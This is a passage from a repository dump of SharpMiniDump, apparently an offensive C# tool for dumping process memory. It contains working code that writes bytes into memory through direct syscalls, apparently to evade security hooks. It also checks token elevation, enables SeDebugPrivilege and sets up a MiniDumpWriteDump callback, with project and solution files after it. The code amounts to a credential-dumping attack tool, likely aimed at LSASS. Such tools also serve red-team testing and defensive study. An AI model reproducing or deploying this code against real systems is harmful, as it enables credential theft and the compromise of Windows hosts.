return false;
}
IntPtr written = IntPtr.Zero;
IntPtr unmanagedPointer = Marshal.AllocHGlobal(AssemblyBytes.Length);
Marshal.Copy(AssemblyBytes, 0, unmanagedPointer, AssemblyBytes.Length);
status = NativeSysCall.ZwWriteVirtualMemory10(Process.GetCurrentProcess().Handle, ref proc, unmanagedPointer, (uint)AssemblyBytes.Length, ref written);
if (status != Natives.NTSTATUS.Success)
{
Console.WriteLine("[x] Error ZwWriteVirtualMemory10 " + status);
return false;
}
status = NativeSysCall.ZwProtectVirtualMemory10(Process.GetCurrentProcess().Handle, ref lpBaseAddress, ref uSize, OldProtection, ref NewProtection);
if (status != Natives.NTSTATUS.Success)
{
Console.WriteLine("[x] Error ZwProtectVirtualMemory10 2" + status);
return false;
}
Marshal.FreeHGlobal(unmanagedPointer);
return true;
}
private static bool IsElevated()
{
return TokenIsElevated(GetCurrentProcessToken());
}
private static IntPtr GetCurrentProcessToken()
{
//https://github.com/cobbr/SharpSploit/blob/master/SharpSploit/Credentials/Tokens.cs
IntPtr currentProcessToken = new IntPtr();
if (!Natives.OpenProcessToken(Process.GetCurrentProcess().Handle, Natives.TOKEN_ALL_ACCESS, out currentProcessToken))
{
Console.WriteLine("Error OpenProcessToken " + new Win32Exception(Marshal.GetLastWin32Error()).Message);
return IntPtr.Zero;
}
return currentProcessToken;
}
private static bool TokenIsElevated(IntPtr hToken)
{
Natives.TOKEN_ELEVATION tk = new Natives.TOKEN_ELEVATION();
tk.TokenIsElevated = 0;
IntPtr lpValue = Marshal.AllocHGlobal(Marshal.SizeOf(tk));
Marshal.StructureToPtr(tk, lpValue, false);
UInt32 tokenInformationLength = (UInt32)Marshal.SizeOf(typeof(Natives.TOKEN_ELEVATION));
UInt32 returnLength;
Boolean result = Natives.GetTokenInformation(
hToken,
Natives.TOKEN_INFORMATION_CLASS.TokenElevation,
lpValue,
tokenInformationLength,
out returnLength
);
Natives.TOKEN_ELEVATION elv = (Natives.TOKEN_ELEVATION)Marshal.PtrToStructure(lpValue, typeof(Natives.TOKEN_ELEVATION));
if (elv.TokenIsElevated == 1)
{
return true;
}
else
{
return false;
}
}
public static bool SetDebugPrivilege()
{
//https://github.com/cobbr/SharpSploit/blob/master/SharpSploit/Credentials/Tokens.cs
string Privilege = "SeDebugPrivilege";
IntPtr hToken = GetCurrentProcessToken();
Natives.LUID luid = new Natives.LUID();
if (!Natives.LookupPrivilegeValue(null, Privilege, ref luid))
{
Console.WriteLine("Error LookupPrivilegeValue" + new Win32Exception(Marshal.GetLastWin32Error()).Message);
return false;
}
Natives.LUID_AND_ATTRIBUTES luidAndAttributes = new Natives.LUID_AND_ATTRIBUTES();
luidAndAttributes.Luid = luid;
luidAndAttributes.Attributes = Natives.SE_PRIVILEGE_ENABLED;
Natives.TOKEN_PRIVILEGES newState = new Natives.TOKEN_PRIVILEGES();
newState.PrivilegeCount = 1;
newState.Privileges = luidAndAttributes;
Natives.TOKEN_PRIVILEGES previousState = new Natives.TOKEN_PRIVILEGES();
UInt32 returnLength = 0;
if (!Natives.AdjustTokenPrivileges(hToken, false, ref newState, (UInt32)Marshal.SizeOf(newState), ref previousState, out returnLength))
{
Console.WriteLine("AdjustTokenPrivileges() Error: " + new Win32Exception(Marshal.GetLastWin32Error()).Message);
return false;
}
return true;
}
private static bool MyMiniDumpWriteDumpCallback(IntPtr CallbackParam, ref Natives.MINIDUMP_CALLBACK_INPUT CallbackInput, ref Natives.MINIDUMP_CALLBACK_OUTPUT CallbackOutput)
{
switch (CallbackInput.CallbackType)
{
case Natives.MINIDUMP_CALLBACK_TYPE.IsProcessSnapshotCallback: // IsProcessSnapshotCallback
CallbackOutput.Status = 1;
break;
}
return true;
}
}
}
================================================
FILE: SharpMiniDump/Properties/AssemblyInfo.cs
================================================
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// Le informazioni generali relative a un assembly sono controllate dal seguente
// set di attributi. Modificare i valori di questi attributi per modificare le informazioni
// associate a un assembly.
[assembly: AssemblyTitle("SharpMiniDump")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("SharpMiniDump")]
[assembly: AssemblyCopyright("Copyright © 2019")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Se si imposta ComVisible su false, i tipi in questo assembly non saranno visibili
// ai componenti COM. Se è necessario accedere a un tipo in questo assembly da
// COM, impostare su true l'attributo ComVisible per tale tipo.
[assembly: ComVisible(false)]
// Se il progetto viene esposto a COM, il GUID seguente verrà utilizzato come ID della libreria dei tipi
[assembly: Guid("6ffccf81-6c3c-4d3f-b15f-35a86d0b497f")]
// Le informazioni sulla versione di un assembly sono costituite dai seguenti quattro valori:
//
// Versione principale
// Versione secondaria
// Numero di build
// Revisione
//
// È possibile specificare tutti i valori oppure impostare valori predefiniti per i numeri relativi alla revisione e alla build
// usando l'asterisco '*' come illustrato di seguito:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
================================================
FILE: SharpMiniDump/SharpMiniDump.csproj
================================================
Debug
AnyCPU
{6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F}
Exe
SharpMiniDump
SharpMiniDump
v4.0
512
true
x64
true
full
false
bin\Debug\
DEBUG;TRACE
prompt
4
true
x64
pdbonly
false
bin\Release\
TRACE
prompt
4
true
true
bin\x64\Debug\
DEBUG;TRACE
true
full
x64
prompt
MinimumRecommendedRules.ruleset
bin\x64\Release\
TRACE
true
pdbonly
x64
prompt
MinimumRecommendedRules.ruleset
================================================
FILE: SharpMiniDump.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.28307.136
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpMiniDump", "SharpMiniDump\SharpMiniDump.csproj", "{6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Debug|x64 = Debug|x64
Release|Any CPU = Release|Any CPU
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F}.Debug|Any CPU.Build.0 = Debug|Any CPU
{6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F}.Debug|x64.ActiveCfg = Debug|x64
{6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F}.Debug|x64.Build.0 = Debug|x64
{6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F}.Release|Any CPU.ActiveCfg = Release|Any CPU
{6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F}.Release|Any CPU.Build.0 = Release|Any CPU
{6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F}.Release|x64.ActiveCfg = Release|x64
{6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F}.Release|x64.Build.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {C4236FC6-7C6F-413C-9583-2CF9548B531E}
EndGlobalSection
EndGlobal